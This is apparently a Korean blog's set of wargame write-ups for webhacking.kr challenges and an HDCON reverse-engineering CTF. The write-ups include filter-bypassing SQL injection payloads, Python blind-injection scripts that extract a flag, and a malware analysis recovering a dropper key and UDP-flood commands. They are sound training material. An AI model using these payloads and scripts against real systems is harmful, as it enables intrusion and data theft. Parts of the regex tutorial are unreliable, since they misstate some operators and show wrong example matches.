19번 문제를 접속하면 id를 입력 받는 것이 하나 나온다.



제출을 누르면



GET 방식의 id라는 파라미터로 입력한 값을 전달한다.


admin으로 로그인을 하는 문제 같다.


우선 다른 아이디로도 접속을 해보자.


다른 아이디로 로그인 한 결과



해더를 수정할 수 없다는 error 메세지가 나온다.


그렇다 문제는 망가졌다.


문제가 복구 되면 다시 풀어 봐야겠다.


끝!

'Wargame > webhacking.kr' 카테고리의 다른 글

webhacking.kr 21번  (0) 2016.11.18
webhacking.kr 20번  (0) 2016.11.17
webhacking.kr 19번  (0) 2016.11.17
webhacking.kr 18번  (0) 2016.11.16
webhacking.kr 17번  (0) 2016.11.16
webhacking.kr 16번  (0) 2016.11.15

18번 문제를 접속하면 아래와 같이 SQL Injection 문제임을 확인 할 수 있다.



index.phps 도 주어졌으니 index.php의 소스를 확인 했다.



내가 알기론 webhacking,kr에는 magic_quotes_gpc가 기본적으로 켜저있다.


하지만 이 문제의 경우 no=$_GET[no] 와 같이 SQL 쿼리문에 쿼터를 사용하지 않고 바로 input 값을 넣어주기 때문에 인젝션이 가능하다.


문제는 id가 admin인 경우에 풀리는 것 같다.


따라서 0 or id='admin'이라는 값을 넣어주면 전체 쿼리는


select id from challenge18_table where id='guest' and no=0 or id='admin'


으로 id가 admin인 row가 리턴될 것 이다.



하지만 여기서 2가지 문제가 있다.


첫 번째로 띄어쓰기(스페이스바)를 필터링 하기 때문에 %20을 %0a로 우회해야 한다.


두 번째로 쿼터를 사용할 수 없다는 것이다.

따라서 admin을 hex값으로 encodeing하여 mysql 쿼리문으로 넘겨주는 방법으로 우회가 가능하다.




하지만 0x를 필터링 하기 때문에 다른 방법을 사용해야한다.


admin을 hex값이 아닌 bin값으로 표현 하는 것이다.



위와 같이 admin을 한글자씩 bin값을 구해서 이어 붙이면 0110000101100100011011010110100101101110값이 나온다.



mysql에서도 정상적으로 bin값들을 문자열으로 인식한다.


따라서 아래와 같이 no값을 0%0aor%0aid=0b0110000101100100011011010110100101101110 로 보내주면 문제를 풀 수 있다.



끝!

'Wargame > webhacking.kr' 카테고리의 다른 글

webhacking.kr 20번  (0) 2016.11.17
webhacking.kr 19번  (0) 2016.11.17
webhacking.kr 18번  (0) 2016.11.16
webhacking.kr 17번  (0) 2016.11.16
webhacking.kr 16번  (0) 2016.11.15
webhacking.kr 15번  (0) 2016.11.15

17번 문제를 접속하면 아래와 같이 input text에 값을 넣고 check라는 버튼이 하나 있다.



아무것도 알 수 없으니 HTML 소스보기를 해봤다.



[line 21]과 같이 input text로 입력한 값이 unlock 값과 같으면 Auth Key를 출력해주는 문제이다.


unlock 값을 알기 위해서 아래와 같이 javascript console을 사용하면 된다.


혹은



따라서 input text에 unlock값인 9997809307을 넣으면 아래와 같이 Auth Key를 구할 수 있다.



끝!


'Wargame > webhacking.kr' 카테고리의 다른 글

webhacking.kr 19번  (0) 2016.11.17
webhacking.kr 18번  (0) 2016.11.16
webhacking.kr 17번  (0) 2016.11.16
webhacking.kr 16번  (0) 2016.11.15
webhacking.kr 15번  (0) 2016.11.15
webhacking.kr 14번  (0) 2016.11.14

16번 문제를 접속해서 보면 아래와 같이 별이 3개 있다.



별에 마우스를 가져가니 별이 1개가 사라졌다.



javascript onmouseover event를 사용한 것 같다.


소스보기를 통해서 자세히 분석을 해보자.


소스 보기한 결과 수상해 보이는 점이 [line 17] 일때 특정 keyCode가 들어 왔을 때 location.href를 사용한다는 것이다.


location.href는 다른 페이지로 이동할 때 사용한다.


따라서 아마 Auth Key가 출력되는 페이지로 이동해주려나 싶어서 어떤 조건일때 인지 봤다.


event.keyCode는 키가 눌렸을때 키보드 키마다 고유 키 값이 있다


그 키 값이 keyCode에 담긴다.


 keyCode를 검색하기 전에 간단하게 아래와 같이 문제를 해결 할 수 있다.



javascript console을 사용하여 cd 값을 임의로 주고 location.href를 바로 실행 시키는 것이다.


다음을 실행 했을 때 아래와 같이 %7C 페이지로 이동하고 Auth Key가 나온다.


끝!

'Wargame > webhacking.kr' 카테고리의 다른 글

webhacking.kr 18번  (0) 2016.11.16
webhacking.kr 17번  (0) 2016.11.16
webhacking.kr 16번  (0) 2016.11.15
webhacking.kr 15번  (0) 2016.11.15
webhacking.kr 14번  (0) 2016.11.14
webhacking.kr 13번  (0) 2016.11.14

15번 문제는 50점으로 최하점 문제이다.



최하점 문제 답게 문제를 접속하면 Access_Denied alert 메세지를 띄우며 바로 쫒아낸다.


까다로운 친구다.


확인을 누르자 password is of~~~~~ 라고 순간적으로 지나간거 같다.


아마 javascript를 사용하여


alert('Access_Denied');

document.wire('password is ~');

histroy.go(-1);


을 사용해서 비밀번호를 잠깐 보여주고 뒤로 자동으로 가도록 코딩한 것 같다.


프록시 툴을 사용하여 확인해보았다.



순서는 틀렸지만 예상이 맞았다.


Auth Key값은 off_script 인가보다.


끝!




'Wargame > webhacking.kr' 카테고리의 다른 글

webhacking.kr 17번  (0) 2016.11.16
webhacking.kr 16번  (0) 2016.11.15
webhacking.kr 15번  (0) 2016.11.15
webhacking.kr 14번  (0) 2016.11.14
webhacking.kr 13번  (0) 2016.11.14
webhacking.kr 12번  (0) 2016.11.13


14번 문제를 접속 했을 때의 화면이다.


우선 아무것도 알 수 없으니 소스보기를 해봤다.



간단한 javascript 문제 같다.


input text에 값을 넣고 버튼을 누르면 ck()라는 javascript 함수를 호출한다.


ck 함수를 보면 URL을 가져와서 무언가 연산을 하고 입력한 input text값과 비교한다.


따라서 우리는 javascript console을 이용하여 ul 값이 무었인지 확인하면 문제를 풀 수 있다.



따라서 위와 같이 콘솔창에 ul을 구하는 과정을 그대로 복사하고 붙여 넣으면 ul=510 인 것을 알 수 있다.


input text에 510을 넣고 check를 누르면 아래와 같이 Auth Key가 나온다.



끝!


'Wargame > webhacking.kr' 카테고리의 다른 글

webhacking.kr 16번  (0) 2016.11.15
webhacking.kr 15번  (0) 2016.11.15
webhacking.kr 14번  (0) 2016.11.14
webhacking.kr 13번  (0) 2016.11.14
webhacking.kr 12번  (0) 2016.11.13
webhacking.kr 11번  (0) 2016.11.13

13번 문제를 접속하면 아래 처럼 SQL Injection 문제가 나온다.



select flag from prob13password 쿼리문에 대한 row를 가져오면 Auth key가 들어있는 것 같다.


먼저 1이라는 값을 제출해보자.



result가 1이라고 나오는데 벌써부터 느낌이 Blind Injection을 해야 할 것만 같다.



혹시 모르니 0값을 보내보자.



0을 보냈을 때는 result가 안나오는 것을 확인 할 수 있다.


배점이 높기 때문에 필터링을 열심히 하는 문제고 열심히 우회하는 문제같다.


하지만 9번 문제를 풀었던 것을 생각하면 쉽게 풀 수 있다.



똑같이 풀면 되는데 아래와 같이 띄어쓰기가 들어가는 경우 필터에 막힌다.



따라서 스페이스바(공백)을 %0a로 치환하여 아래의 스크립트를 사용하여 풀면 문제를 풀 수 있다.


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
import urllib2, re, string
 
header = {'Cookie':'PHPSESSID=jeong0su'}
result = str()
subqry = "select flag from prob13password".replace(' ','%0A')
 
for i in range(120):
    for j in string.printable:
        param = "(substr((" + subqry + ")," + str(i) + ",1)in(" + hex(ord(j)) + "))"
        req = urllib2.Request('http://webhacking.kr/challenge/web/web-10/?no='+param, headers=header)
        res = urllib2.urlopen(req).read()
 
        if re.findall("<td>1</td>", res):
            result += j
break
 
    print result



근데 이상하게도 스크립트를 돌리는데 결과 값이 나오지를 않는다.


여러개의 row가 존재 할 수 있기 때문에 select count(flag) from prob13password 쿼리를 사용해 갯수를 알아봤다.


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
import urllib2, re, string
 
header = {'Cookie':'PHPSESSID=jeong0su'}
result = str()
subqry = "select count(flag) from prob13password".replace(' ','%0A')
 
for i in range(120):
    for j in string.printable:
        param = "(substr((" + subqry + ")," + str(i) + ",1)in(" + hex(ord(j)) + "))"
        req = urllib2.Request('http://webhacking.kr/challenge/web/web-10/?no='+param, headers=header)
        res = urllib2.urlopen(req).read()
 
        if re.findall("<td>1</td>", res):
            result += j
            break
 
    print result
 
# result: 2


역시나 2개의 row가 있었기 때문에 그냥 select flag from prob13password 했을 때 내부 오류로 아무런 결과가 나오지 않았다.

(서브 쿼리에서는 row가 반드시 1개여야 한다. 안그러면 mysql 오류가 발생한다.)


하지만 여기서 문제가 생겼다.

limit를 필터링 하기 때문에 한개의 row만 가져올 수 없었다.


여기서 생각난게 min, max이다.


따라서 select min(flag) from prob13password 와 같은 쿼리문을 이용하여 최소값 1개를 가져올 수 있다.

(여기서 min, max는 첫 번째 글자의 순서에 따른 결과 일 것이다.)


min(flag)의 결과는 flag이므로 제대로 된 Auth Key값은 max로 구 할 수 있다.


따라서 아래의 Python 스크립트로 Auth Key값을 구할 수 있다.


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
import urllib2, re, string
 
header = {'Cookie':'PHPSESSID=jeong0su'}
result = str()
subqry = "select min(flag) from prob13password".replace(' ','%0A')
 
for i in range(120):
    for j in string.printable:
        param = "(substr((" + subqry + ")," + str(i) + ",1)in(" + hex(ord(j)) + "))"
        req = urllib2.Request('http://webhacking.kr/challenge/web/web-10/?no='+param, headers=header)
        res = urllib2.urlopen(req).read()
 
        if re.findall("<td>1</td>", res):
            result += j
            break
 
    print result
 
# result: challenge13luckclear


Auth Key값을 index.php에 넣고 보내주면 아래와 같이 문제가 풀리게 된다.



끝!

'Wargame > webhacking.kr' 카테고리의 다른 글

webhacking.kr 15번  (0) 2016.11.15
webhacking.kr 14번  (0) 2016.11.14
webhacking.kr 13번  (0) 2016.11.14
webhacking.kr 12번  (0) 2016.11.13
webhacking.kr 11번  (0) 2016.11.13
webhacking.kr 10번  (0) 2016.11.12

2016 HDCON 역공학 OpenCTF 문제로 윈도우 바이너리를 하나 받았다.


hdconmalware



1. 악성코드 Entry Point는?

2. 악성코드 내부에는 악성 앱이 존재한다. 악성 앱이 생성되기 위해 입력해야 되는 Key 값(인자 값)은 무엇인가? 악성 앱의 MD5는?

3. 악성 앱이 UDP Flooding을 위해 해커로부터 받는 명령 문자[1]는 무엇인가?

4. 악성 앱이 UDP Flooding을 위해 해커로부터 받는 명령 문자[2]는 무엇인가?

주어진 바이너리를 분석하여 위에 해당하는 4가지 문제를 풀어야 한다.


file 명령어를 통해 파일을 확인했고 IDA Pro를 사용해 바이너리를 열었을 때 UPX로 패킹 된 것을 알 수 있다.


PEiD로 확인한 결과 역시 UPX로 패킹이 되어있다.



우선 문제 1. 악성코드 Entry Point는? 를 해결하기 위해서 IDA Pro를 사용하여 파일을 열었다.


어셈블리 코드 끝 부분의 popa 혹은 popad 뒤에 나오는 jmp 명령어가 OEP를 가르키므로 Entry Point는 00403E4D이다.

분석을 계속하기 위해서 Entry Point로 점프하는 부분에 브레이크포인트를 걸어주고 실행한 뒤 Step into기능을 사용하여 Entry Point로 이동했다.


Entry Point 부분에 도착한 뒤 Hex-Rays 기능을 사용하여 Pseudocode를 확인했다.

dword_401000[96] 이부분이 main 함수를 호출 하는 부분으로 0x401000 + 96*4 = 0x00401180 이다.


main 함수로 이동하여 바이너리를 분석하면 프로그램을 실행할 때 인자를 받고 XOR 연산을 통해 v6,"Z$B5K1]1" 값과 비교한다.

XOR 연산의 특징 때문에 어떤 값을 key로 넣었을 때 v6,"Z$B5K1]1"  값이 되는지는 아래의 Python 스크립트를 통해 간단하게 알 수 있다.


1
2
3
4
5
6
7
8
9
10
decode = "Z$B5K1]1"
key = ""
for i in range(len(decode)):
    if i % 2:
        key += chr(ord(decode[i])^0x45)
    else:
        key += chr(ord(decode[i])^0x32)
print key
 
# key: happytot



따라서 해당 바이너리는 happytot라는 값을 인자로 주고 실행 할 때 sub_4010B0() 함수를 호출한다.

sub_4010B0() 함수는 Temp 경로를 구하고 sub_401000() 함수를 호출하는데 sub_401000() 함수에서 Temp 폴더에 apk 파일을 생성한다.


따라서 올바른 키 값을 인자로 주고 실행을 하면 Temp 폴더에서 apk 파일이 생성 된 것을 확인 할 수 있다.

(malware.apk 파일의 md5 hash 값은 23D64BC5C908BFEBC227851090C8D1F9이다.)


malware.apk 파일을 JEB2를 사용하여 분석할 때 문제가 UDP Flooding 이였기 때문에 Receive Class 파일을 먼저 분석하였다.

(악성 앱이 UDP Flooding을 위해 해커로부터 받는 명령 문자는 무엇인가?)



처음에 문제를 잘못 이해해서 서버에 보내는 내용을 찾는 것으로 생각하고 www.krcert.or.kr의 5555 포르토 보내는 값인 아래 2개를 정답으로 제출했다.

- Thanks! HDCON!

- Do you wnat to get a blutooth keyboard?


OpenCTF 진행해주시는 분이 답안이 잘못 됨을 알려주시고 처음부터 차근차근 다시 봤다.


문제의 정답은 해커로부터 받는 명령어이기 때문에 아래 2개의 값이 정답이다.

- v5, You Got A HDCON Badge!

getReal(v1), v1의 Base64로 인코딩 된 문자열을 getReal 함수로 넣어주었을 때의 결과 값


getReal 함수를 분석해보면 v1 값과 512까지의 랜덤 수를 Test 클래스의 aaaaaaaaa 함수로 넘겨준다.


Test.aaaaaaaaa 함수를 따라 들어가면 위 함수와 같다.

Test.aaaaaaaaaa 함수를 호출하면서 마지막에 true라는 인자를 함께 넘겨준다.

(인코딩을 할 때 false를 사용하고 디코딩을 할 때 true 인자를 사용하는 것 같다.)


Test.aaaaaaaaaa 함수의 경우 sssssssssssssssss라는 스트링을 사용하는데 문자열의 길이는 자그마치 32768자이다. 

(여기서 엄청 삽질 한게 JEB2에서 출력해주는 경우 전체 문자열이 아닌 3000개 가량의 문자열만 출력을 해줘서 시간을 많이 보냈다.)


따라서 Test.aaaaaaaaaa 함수를 똑같이 Python 스크립트로 구현한 뒤 512개의 브루투포싱을 통해서 마지막 정답을 구할 수 있었다.


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
import string
 
v1 = "77xChf0VUuJ6BSaZMuPhvJMdKuJ="
table = ""
xx = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
 
for arg9 in range(512):
    new = ""
    for i in range(len(v1)):
        if v1[i] == "=":
            new += "="
            break
        new += table[arg9 * 2 * 2 * 2 * 2 * 2 * 2: arg9 * 2 * 2 * 2 * 2 * 2 * 2 + 64][xx.find(v1[i])]
 
    if False not in ([(char in string.printable) for char in new.decode('base64')]):
        print arg9, new.decode('base64')


정답은 arg9가 320일 때의 You win! 2016 HDCON! 이다.



오늘 2016 HDCON 역공학 OpenCTF를 1등해서 3등까지 주는 블루투스 키보드를 받았다.

내가 1등을 할 수 있었던 이유는 참가자가 나 혼자였기 때문이다.

잘하시는 분들이 푸셨으면 분석 속도부터 차이가 났을텐데...

만세!



'Write-ups' 카테고리의 다른 글

2016 HDCON 역공학 OpenCTF  (1) 2016.11.14
  1. Orca 2016.11.15 00:02

    ㅋㅋㅋㅋㅋ 주모! 여기 국가대표 단! 하나!

12번 문제를 접속하면 javascript challenge라고 나온다.




요런 문제는 HTML 소스보기 + javascript console을 사용하면 아주 쉽게 풀 수 있다.




우선 HTML 소스보기를 해주자!



역시 javascript가 난독화 되어 있을 줄 알았다.


이정도 난독화는 아주 간단한 편이다.


대부분 이런 문제의 경우 eval로 코드를 실행 해준다.


자바스크립트 콘솔을 열어 eval 함수를 cosole.log 함수로 바꿔주면 아래와 같이 복호화 된 javascript 코드를 확인 할 수 있다.



이제 소스코드를 분석하기만 하면 된다.


Password가 출력되는 조건을 보면 ck랑 특정 더한 값이 같을 때 Password가 ck 값에서 =을 뺀 것이라고 알려주고 있다.


따라서 javascript 콘솔창에 아래와 같이 ck랑 비교하는 값을 넣어보자.




"=youaregod~~~~~~~!"라는 문자열이 나왔다.


즉 Password는 =을 뺀 "youaregod~~~~~~~!" 가 된다.


끝!

'Wargame > webhacking.kr' 카테고리의 다른 글

webhacking.kr 14번  (0) 2016.11.14
webhacking.kr 13번  (0) 2016.11.14
webhacking.kr 12번  (0) 2016.11.13
webhacking.kr 11번  (0) 2016.11.13
webhacking.kr 10번  (0) 2016.11.12
webhacking.kr 9번  (0) 2016.11.12

webhacking.kr Challenge11 문제를 풀다가 php의 'preg_match' 함수를 만나게 되었다.

해당 문제에서는 정규식표현에 쓰이는 특수문자들이 있었다.

처음에는 특수문자가 왜 쓰이는지 알 수 없었고 곧 구글링을 통해 정규표현식임을 알 수 있었다.



webhacking.kr Challenge 11 write up!

if(preg_match($pat,$val)) { echo("Password is ????"); }

$pat="/[1-3][a-f]{5}_.*165.128.238.19.*\tp\ta\ts\ts/";

$pat을 나눠서 해석해보자

[1-3] : (1, 2, 3) 중에서 아무 숫자 하나 = 1

[a-f] : (a, b, c, d, e, f) 중에서 아무 문자 하나 = 1a

{5} : 앞에 나온 문자가 5번 나와야함 = 1aaaaa

_ : 정규표현식에 쓰이는 특수문자가 아님 = 1aaaaa_

.* : '.'는 어떤 문자 하나, '*'는 앞의 문자가 안나오거나 하나. 따라서 어떤문자를 안써줘도 된다 = 1aaaaa_

165 : 숫자이므로 그대로 작성 =  1aaaaa_165

. : 어떤 문자 하나(임의로 a 작성) = 1aaaaa_165a

128 : 숫자이므로 그대로 작성 =  1aaaaa_165a128

. : 어떤 문자 하나(임의로 a 작성) = 1aaaaa_165a128a

238 : 숫자이므로 그대로 작성 =  1aaaaa_165a128a238

. : 어떤 문자 하나(임의로 a 작성) = 1aaaaa_165a128a238a

19 : 숫자이므로 그대로 작성 =  1aaaaa_165a128a238a19

.* : 위와 같이 어떤 문자를 안써줘도 된다 = 1aaaaa_165a128a238a19

\t : Tap = <1aaaaa_165a128a238a19    > (Tap을 보여주기위해 <>안에 넣음)

p : 문자이므로 그대로 작성 = 1aaaaa_165a128a238a19    p

\t : Tap = <1aaaaa_165a128a238a19    p    > (Tap을 보여주기위해 <>안에 넣음)

a : 문자이므로 그대로 작성 = 1aaaaa_165a128a238a19    p    a

\t : Tap = <1aaaaa_165a128a238a19    p    a    > (Tap을 보여주기위해 <>안에 넣음)

s : 문자이므로 그대로 작성 = 1aaaaa_165a128a238a19    p    p    s

\t : Tap = <1aaaaa_165a128a238a19    p    a    s    > (Tap을 보여주기위해 <>안에 넣음)

s : 문자이므로 그대로 작성 = 1aaaaa_165a128a238a19    p    a    s    s


따라서 $val = "1aaaaa_165a128a238a19 p a s s"; 일때 인증키를 얻을 수 있다.



정규표현식(regular expression)이란? :

- 특정한 규칙을 가진 문자열의 집합을 표한하는데 사용하는 형식언어.

- 정해진 패턴을 사용해서 패턴에 일치하는 데이터 검색을 지워하는 표현식.



정규표현식의 문법 :

1. '.' : 임의의 한문자

ex)

c.s = cjs, cas, cbs, cds, ces, ...

.js = cjs, ajs, bjs, djs, fjs, ...


2. '*' : 바로 앞의 문자가 없거나 하나 이상(즉 0개 이상을 포함)

ex)

c*s = s, cs, css, ccs, cccs, ...

abc* = ab, abc, abcc, abccc, abcccc, ...

ka*b = kb, kab, kaab, kaaab, kaaaab, ...


3. '+' : 바로 앞의 문자가 하나 이상(즉 1개 이상을 포함)

ex)

j+s = js, jjs, jjjs, jjjjs, jjjjjs, ...

abc+ = abc, abcc, abccc, abcccc, abccccc, ...


4. '?' : q바로 앞의 문자가 없가나 하나(즉 1개 또는 0개 이상을 포함)

ex)

cj?s = s, cjs (두가지 표현이 유일)

c?at = at, cat (두가지 표현이 유일)


5. '^' : 바로 뒤의 문자열로 시작

ex)

^This = This is my Book, Thisead, ...

^a?bc = bc, abc, ...

^.e = he, me, request, settle, ...

^s.e? = sa, sae, sb, sbe (e는 있어도 되고 없어도 되고)


6. '$' : 바로 앞의 문자열로 종료

ex)

a?bc$ = eeabe, seebc, bc, ...

+.e$ = onthetoe, hctae, appetitlle, ...

s?c+$ = e, se, ee, eee, seee, seeee, ...


7. '[]' : [] 안에 있는 문자 중 하나, 범위는 '-'로 지정

ex)

[ab]cd = acd, bcd, ...

[a-z] = a부터 z까지

[a-zA-Z] = 대소문자 모두 a부터 z까지

[0-9] = 0부터 9까지

ag[a-z] = aga, agbcd, agzzz, ...

^ab[cd]ef = abcef, abdef, ...

^[a-zA-Z] = 영문자로 시작

^[a-zA-Z_] = 첫글자가 영어 대소문자와 '_' 만 사용 가능

^[가-힣]  =  한글로 시작

[^a-zA-Z0-9]  =  ^은 안으로 들어가면 제외(부정)의 의미가 된다. 영어 대소문자나 숫자로 시작 불가

[a-zA-Z0-9]$ = 영어 대소문자나 숫자로 종료


8. '{}' : 앞의 문자나 문자열 출현 횟수

ex)

a{2}b = aab, ... (a가 반드시 2번 나와야함)

a{2,}b = aab, aaab, aaaab, ... (a가 최소한 2번 이상 나와야함)

a{2, 4}b = aab, aaab, aaab, ... (a가 최소 2번 최대 4번 나와야함)


9: '()' : ()안에 있는 문자를 그룹화

ex)

a(bc){2} = abcbc (a다음으로 bc가 2번 나와야함)

a(bc)* = abcbcbc (a다음에 bc는 무제한으로 나올수 있음)


10. '|' : or 연산자

ex)

he|she = he is, she is


Reference

: http://ko.wikipedia.org/wiki/정규_표현식

: http://www.devholic.net/1000238


PS. 사실 2014.08.02에 작성했던 글이다.



'Wargame > webhacking.kr' 카테고리의 다른 글

webhacking.kr 13번  (0) 2016.11.14
webhacking.kr 12번  (0) 2016.11.13
webhacking.kr 11번  (0) 2016.11.13
webhacking.kr 10번  (0) 2016.11.12
webhacking.kr 9번  (0) 2016.11.12
webhacking.kr 8번  (0) 2016.11.11

+ Recent posts